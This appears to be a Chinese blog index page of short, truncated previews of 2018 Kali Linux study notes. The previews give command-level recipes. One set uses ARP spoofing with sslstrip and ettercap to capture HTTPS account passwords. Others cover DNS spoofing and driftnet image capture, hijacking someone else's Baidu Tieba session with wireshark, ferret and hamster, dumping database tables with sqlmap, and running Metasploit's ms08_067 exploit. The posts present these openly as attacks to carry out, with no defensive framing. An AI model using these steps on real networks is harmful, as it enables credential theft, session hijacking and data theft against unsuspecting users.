kali linux
王先生的王
偶尔写写blog,一个20来岁的小伙子
展开
-
https账号密码获取
1. arp欺骗2. vim/etc/ettercap/etter.conf 将 #if you useiptables语句下面的两条语句的#号注释去掉3. sslstrip -a -f -k (利用sslstrip将https协议还原成http协议)4. ettercap -Tq -i eth0...原创 2018-04-05 08:39:11 · 1952 阅读 · 0 评论 -
利用arp欺骗获取http账号
首先,进行arp欺骗1.arpspoof -i 网卡 -t 目标ip 网关 然后使用ettercap进行DNS欺骗ettercap ->欺骗 DNS欺骗 流量嗅探2. ettercap -Tq -i eth0-Tq --启动文本模式 q安静模式-i 网卡...原创 2018-04-05 08:37:05 · 999 阅读 · 0 评论 -
kali linux 学习 arp篇
Arp欺骗 arpspoof -i 网卡 -t 目标ip 网关进行ip流量转发echo 1 > /proc/sys/net/ipv4/ip_forward( 转发到自己的网卡)driftnet 图片捕获driftnet[options] [filter code]主要参数:-b 捕获到新的图片时发出嘟嘟声-i interface 选择监听接口-f file 读取一个指定pcap数据包中的...原创 2018-04-05 08:35:16 · 427 阅读 · 1 评论 -
会话劫持 --内网无敌
会话劫持-登陆别人的百度贴吧1. arp欺骗2. wireshark –抓包抓到想要的数据包后保存,后缀为pacp3. ferret --重新生成抓包后的文件然后使用 ferret –r 上面抓包保存的文件xx.pacp成功后将生成一个新文件hamster.txt4. hamster --重放流量该软件会要求修改代理及端口访问该地址及端口5. ...原创 2018-04-05 09:24:48 · 2024 阅读 · 2 评论 -
sqlmap的使用
1.sqlmap -u 网址-u 检测是否存在注入点 返回数据库的名字2.sqlmap -u 网址 --tables 列出全部表(猜解模式)3.sqlmap -u 网址 --columns -T “表名” (- columns猜列名 –T表名)4. sqlmap -u 网址 --dump -C “列名,列名” -T “表名” (dump下载数据 –C“”列名) SQLMAP 及PHP网站渗透...原创 2018-04-05 10:38:31 · 221 阅读 · 0 评论 -
Metasploit的使用
Exploit模块 –>漏洞利用 Payloads -->shellCode 漏洞利用后执行的代码1. msfconsole 进入msfshow 命令展示所有漏洞use exploit。。。(例如:use exploit/windows/smb/ms08_067_netapi)选择漏洞利用模块2. 之后 show options 查看要填入的参数3. ...原创 2018-04-06 10:20:25 · 176 阅读 · 0 评论